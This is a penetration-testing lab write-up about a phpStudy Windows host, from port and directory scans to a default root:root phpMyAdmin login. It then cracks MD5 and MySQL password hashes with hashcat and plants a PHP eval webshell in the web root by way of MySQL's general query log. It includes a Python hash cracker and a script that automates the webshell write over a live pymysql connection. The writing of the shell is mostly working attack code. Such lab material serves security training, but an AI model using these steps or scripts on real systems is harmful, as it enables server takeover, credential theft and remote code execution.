Internal Network Penetration - Project 1: Layer 2 Network
Information Gathering
Port Scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 10.8.0.101 --min-rate=1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 21:32 CST
Nmap scan report for 10.8.0.101
Host is up (0.00015s latency).
All 65535 scanned ports on 10.8.0.101 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 109.63 seconds
The port scan found nothing: all 65535 TCP ports come back as filtered (no response at all), which is what a host firewall silently dropping the probes looks like; closed ports would answer with a RST. Note that this scan targeted 10.8.0.101, while the directory scan below runs against 10.10.0.101.
Directory Scan
Run dirsearch directly against the web root:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# dirsearch -u http://10.10.0.101/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/Downloads/reports/http_10.10.0.101/__25-04-17_21-43-18.txt
Target: http://10.10.0.101/
[21:43:18] Starting:
[21:43:25] 403 - 211B - /%3f/
[21:43:25] 403 - 215B - /%C0%AE%C0%AE%C0%AF
[21:43:25] 403 - 210B - /%ff
[21:43:31] 403 - 220B - /.ht_wsr.txt
[21:43:31] 403 - 223B - /.htaccess.bak1
[21:43:31] 403 - 225B - /.htaccess.sample
[21:43:31] 403 - 223B - /.htaccess.orig
[21:43:31] 403 - 223B - /.htaccess.save
[21:43:31] 403 - 223B - /.htaccess_orig
[21:43:31] 403 - 224B - /.htaccess_extra
[21:43:31] 403 - 221B - /.htaccessBAK
[21:43:31] 403 - 222B - /.htaccessOLD2
[21:43:31] 403 - 221B - /.htaccessOLD
[21:43:31] 403 - 221B - /.htaccess_sc
[21:43:31] 403 - 213B - /.htm
[21:43:31] 403 - 223B - /.htpasswd_test
[21:43:31] 403 - 219B - /.htpasswds
[21:43:31] 403 - 214B - /.html
[21:43:31] 403 - 220B - /.httr-oauth
[21:44:45] 403 - 225B - /index.php::$DATA
[21:45:08] 301 - 238B - /phpMyAdmin -> http://10.10.0.101/phpMyAdmin/
[21:45:08] 301 - 238B - /phpmyadmin -> http://10.10.0.101/phpmyadmin/
[21:45:09] 200 - 71KB - /phpinfo.php
[21:45:11] 200 - 2KB - /phpmyadmin/README
[21:45:11] 200 - 4KB - /phpMyAdmin/
[21:45:11] 200 - 4KB - /phpmyadmin/index.php
[21:45:11] 200 - 4KB - /phpMyAdmin/index.php
[21:45:11] 200 - 4KB - /phpMyadmin/
[21:45:11] 200 - 4KB - /phpmyadmin/
[21:45:11] 200 - 4KB - /phpmyAdmin/
[21:45:11] 200 - 32KB - /phpmyadmin/ChangeLog
[21:45:38] 403 - 225B - /Trace.axd::$DATA
[21:45:46] 403 - 226B - /web.config::$DATA
Task Completed
The output shows the site's default page, a phpinfo.php page, and several paths belonging to the MySQL web-administration tool phpMyAdmin:
- Target default page:

Testing the MySQL connection check at the bottom of that page with the default credentials root:root reports success:

A later attempt to connect to MySQL remotely failed, so the service presumably only accepts local connections (consistent with the port scan, which found no open port).
The function check further down the page is of little use: it only reports which functions are enabled, it cannot run them.
- MySQL admin page: /phpMyAdmin
Logging in with the credentials found above (root:root) succeeds:

- Admin tool version: /phpmyadmin/ChangeLog

The current phpMyAdmin version can be read from the top of the ChangeLog.
Database Information Leakage
Cracking the yxcms administrator password
Browsing the databases reveals one named newyxcms containing a yx_admin table, which holds an account named admin:

Hash identification shows a 32-hex-character MD5 hash (a hash, not an encoding, so it has to be cracked or looked up rather than decoded):
Rainbow-table lookup result:
Recovered plaintext password: 949ba59abbe56e05
Cracking the local root user password
The built-in mysql database has a user table, which holds the credential hash of a local account:

Identification shows it is of type MySQL4.1/MySQL5 (MySQL's PASSWORD(): SHA1 applied twice, 40 hex characters, stored in mysql.user with a leading '*'):

Crack it with hashcat; the hash mode for MySQL4.1/MySQL5 is 300 (the leading '*' is dropped from the hash string):
PS>.\hashcat.exe '81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' -m 300 -a 0 D:\SafetyTools\FUZZ工具包\字典\rockyou.txt
...
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 140 MB
Dictionary cache hit:
* Filename..: D:\SafetyTools\FUZZ工具包\字典\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
81f5e21e35407d884a6cd4a731aebfb6af209e1b:root
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: 81f5e21e35407d884a6cd4a731aebfb6af209e1b
Time.Started.....: Thu Apr 17 22:15:49 2025 (1 sec)
Time.Estimated...: Thu Apr 17 22:15:50 2025 (0 secs)
...
Started: Thu Apr 17 22:15:16 2025
Stopped: Thu Apr 17 22:15:51 2025
The recovered plaintext is: root
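The two hash formats met above differ only in length and construction, which is what the identification step keys on. The script below, an added example that is not part of the original writeup, identifies a hash as MD5 or MySQL4.1/MySQL5, recomputes the MySQL PASSWORD() function (SHA1 of the raw SHA1 digest), and runs a dictionary attack with a small constructed wordlist standing in for rockyou.txt. Only the mysql.user hash from the hashcat run is used, since the yxcms admin hash itself is not reproduced on the page.

```python
"""Identify and dictionary-crack the hash formats seen in the dumped tables.

Added example, not from the original writeup. WORDLIST is a constructed
stand-in for rockyou.txt.
"""
import hashlib
import re
from typing import Iterable, Optional

# Hash formats as they appear in the dumped tables.
MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")
MYSQL41_RE = re.compile(r"^\*?[0-9a-fA-F]{40}$")  # mysql.user stores a leading '*'

# Hash pulled from mysql.user in the writeup (hashcat -m 300 input, '*' removed).
MYSQL_ROOT_HASH = "81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"

# Constructed stand-in for rockyou.txt.
WORDLIST = ["123456", "password", "admin", "root", "toor", "phpstudy"]


def identify(h: str) -> str:
    """Return the hash family the string belongs to, or 'unknown'."""
    h = h.strip()
    if MYSQL41_RE.match(h):
        return "MySQL4.1/MySQL5"  # hashcat mode 300
    if MD5_RE.match(h):
        return "MD5"  # hashcat mode 0
    return "unknown"


def md5_hex(password: str) -> str:
    """Plain MD5, as yxcms stores its admin password."""
    return hashlib.md5(password.encode()).hexdigest()


def mysql41(password: str) -> str:
    """MySQL PASSWORD(): SHA1 over the raw SHA1 digest, upper-case hex."""
    inner = hashlib.sha1(password.encode()).digest()
    return hashlib.sha1(inner).hexdigest().upper()


HASHERS = {"MD5": md5_hex, "MySQL4.1/MySQL5": mysql41}


def crack(h: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: hash each candidate with the identified algorithm."""
    kind = identify(h)
    if kind not in HASHERS:
        return None
    target = h.strip().lstrip("*").lower()
    hasher = HASHERS[kind]
    for candidate in wordlist:
        if hasher(candidate).lower() == target:
            return candidate
    return None


if __name__ == "__main__":
    print(identify(MYSQL_ROOT_HASH), crack(MYSQL_ROOT_HASH, WORDLIST))
```

The same loop is what hashcat does at scale; the point of writing it out is that the double SHA1 has no salt, so one hash computation per candidate is enough and any word in the list is found in a single pass, which is why the hashcat run above finishes in a second.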
Getshell
Writing a shell via phpMyAdmin
Prerequisites
- root privileges on MySQL (strictly, the SUPER privilege, which SET GLOBAL requires)
- The absolute path of the web root: the target's front page prints it as C:/phpStudy/WWW
Writing the shell through the general query log
1. Check the current general-log settings (note the original general_log_file so it can be restored afterwards):
SHOW VARIABLES LIKE 'general%';
2. Enable the general query log:
set global general_log = "ON";
3. Point the log file at a PHP file inside the web root (backslashes are doubled because this is a MySQL string literal):
set global general_log_file='C:\\phpStudy\\WWW\\revshell.php';

4. Write the one-line webshell into the log file. The general log records every statement verbatim, so the string literal ends up in revshell.php; PHP ignores the surrounding log text outside the <?php ... ?> tags:
select '<?php @eval($_POST[cmd]);?>';
This route works even when secure_file_priv blocks SELECT ... INTO OUTFILE, because that setting does not govern the log file path; what it does require is a MySQL service account that can write into the web root, which is usually the case with a phpStudy install on Windows.
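The four steps above are a fixed sequence, and the two details that usually trip people up are the backslash escaping in the Windows path and forgetting to put the log back afterwards, so that every later query keeps being appended to the shell file. The script below is an added example, not part of the original writeup: it builds the statements with correct escaping, runs them over any DB-API 2.0 connection (pymysql.connect(host=..., user="root", password="root") is the assumed real one), snapshots the original settings first and restores them at the end. The FakeConnection is a constructed stand-in so the flow can be exercised without a server.

```python
"""Automate the general_log write above over a DB-API connection.

Added example, not part of the original writeup. It assumes any DB-API 2.0
connection object with cursor().execute()/fetchall(), for instance
pymysql.connect(host=..., user="root", password="root"); FakeConnection
at the bottom is a constructed stand-in so the flow runs without a server.
"""
from typing import Dict, List


def mysql_string_literal(value: str) -> str:
    """Quote a value as a MySQL single-quoted string literal.

    Backslashes are doubled: for the server to see C:\\phpStudy\\WWW, every
    backslash in the Python string must become two in the SQL text.
    """
    escaped = value.replace("\\", "\\\\").replace("'", "\\'")
    return "'" + escaped + "'"


def log_write_statements(webroot: str, filename: str, payload: str) -> List[str]:
    """The statements, in order, that turn the general query log into a PHP file."""
    path = webroot.rstrip("\\/") + "\\" + filename  # Windows web root, as on the target
    return [
        "SET GLOBAL general_log = 'ON'",
        "SET GLOBAL general_log_file = " + mysql_string_literal(path),
        # The statement is logged verbatim, so the literal lands in the file;
        # PHP ignores the log text outside the <?php ... ?> tags.
        "SELECT " + mysql_string_literal(payload),
    ]


def write_shell(conn, webroot: str, filename: str, payload: str) -> Dict[str, str]:
    """Snapshot the log settings, write the shell, then restore the settings.

    Returns the original settings so the operator can see what was changed.
    """
    cur = conn.cursor()
    cur.execute("SHOW VARIABLES LIKE 'general_log%'")
    original = {name: value for name, value in cur.fetchall()}
    for stmt in log_write_statements(webroot, filename, payload):
        cur.execute(stmt)
    # Restore the old file first so later queries (including these) stop
    # being appended to the shell, then return general_log to its old state.
    cur.execute("SET GLOBAL general_log_file = " + mysql_string_literal(original["general_log_file"]))
    cur.execute("SET GLOBAL general_log = " + mysql_string_literal(original["general_log"]))
    return original


class FakeConnection:
    """Constructed stand-in for a DB-API connection; records what would be executed."""

    def __init__(self) -> None:
        self.executed: List[str] = []

    def cursor(self):
        return _FakeCursor(self.executed)


class _FakeCursor:
    def __init__(self, executed: List[str]) -> None:
        self._executed = executed
        self._rows = []

    def execute(self, stmt: str) -> None:
        self._executed.append(stmt)
        if stmt.startswith("SHOW VARIABLES"):
            # Values a stock phpStudy MySQL might report (constructed, not from the page).
            self._rows = [("general_log", "OFF"),
                          ("general_log_file", "C:\\phpStudy\\MySQL\\data\\host.log")]
        else:
            self._rows = []

    def fetchall(self):
        return self._rows


if __name__ == "__main__":
    conn = FakeConnection()
    write_shell(conn, "C:\\phpStudy\\WWW", "revshell.php", "<?php @eval($_POST[cmd]);?>")
    print("\n".join(conn.executed))
```

Against a real server, pass the pymysql connection instead of FakeConnection; the SET GLOBAL statements still need SUPER, exactly as the prerequisites above say, and the shell file is left in place after the log is restored.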
Bringing the shell online
Connect to the shell with AntSword (蚁剑):

Connected successfully.
Lateral Movement
Reproduce the vulnerability directly: Zerologon
Reference: Zerologon reproduction
